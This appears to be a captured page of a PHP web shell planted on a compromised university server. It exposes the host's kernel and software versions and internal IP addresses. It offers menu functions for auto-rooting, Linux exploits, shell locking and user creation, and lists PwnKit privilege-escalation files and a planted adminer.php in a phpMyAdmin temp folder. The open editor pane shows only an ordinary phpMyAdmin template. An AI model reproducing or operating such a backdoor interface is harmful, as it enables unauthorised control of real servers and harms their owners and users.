Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
phpmyadmin /
tmp /
twig /
7c /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
7c9c89edc45a506d4bb8d2af30f62232.php
3.29
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 7c9c89edc45a506d4bb8d2af30f62232.php
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; /* server/user_groups/edit_user_groups.twig */ class __TwigTemplate_9186a0fb8e39b391329adfe470f94f7a extends Template { private $source; private $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->parent = false; $this->blocks = [ ]; } protected function doDisplay(array $context, array $blocks = []) { $macros = $this->macros; // line 1 if ((($context["user_group"] ?? null) == null)) { // line 2 echo " <h2>"; echo _gettext("Add user group"); echo "</h2> "; } else { // line 4 echo " <h2>"; echo twig_escape_filter($this->env, twig_sprintf(_gettext("Edit user group: '%s'"), ($context["edit_user_group_special_chars"] ?? null)), "html", null, true); echo "</h2> "; } // line 6 echo "<form name=\"userGroupForm\" id=\"userGroupForm\" action=\""; echo ($context["user_group_url"] ?? null); echo "\" method=\"post\"> "; // line 7 echo ($context["hidden_inputs"] ?? null); echo " <fieldset class=\"pma-fieldset\" id=\"fieldset_user_group_rights\"> <legend>"; echo _gettext("User group menu assignments"); // line 9 echo " <input type=\"checkbox\" id=\"addUsersForm_checkall\" class=\"checkall_box\" title=\"Check all\"> <label for=\"addUsersForm_checkall\">"; echo _gettext("Check all"); // line 11 echo "</label> </legend> "; // line 13 if ((($context["user_group"] ?? null) == null)) { // line 14 echo " <label for=\"userGroup\">"; echo _gettext("Group name:"); echo "</label> <input type=\"text\" name=\"userGroup\" maxlength=\"64\" autocomplete=\"off\" required=\"required\"> <div class=\"clearfloat\"></div> "; } // line 18 echo " "; echo ($context["tab_list"] ?? null); echo " </fieldset> <fieldset id=\"fieldset_user_group_rights_footer\" class=\"pma-fieldset tblFooters\"> <input class=\"btn btn-primary\" type=\"submit\" value=\""; echo _gettext("Go"); // line 21 echo "\"> </fieldset> </form> "; } public function getTemplateName() { return "server/user_groups/edit_user_groups.twig"; } public function isTraitable() { return false; } public function getDebugInfo() { return array ( 89 => 21, 81 => 18, 73 => 14, 71 => 13, 67 => 11, 62 => 9, 56 => 7, 51 => 6, 45 => 4, 39 => 2, 37 => 1,); } public function getSourceContext() { return new Source("", "server/user_groups/edit_user_groups.twig", "/opt/lampp/phpmyadmin/templates/server/user_groups/edit_user_groups.twig"); } }
Close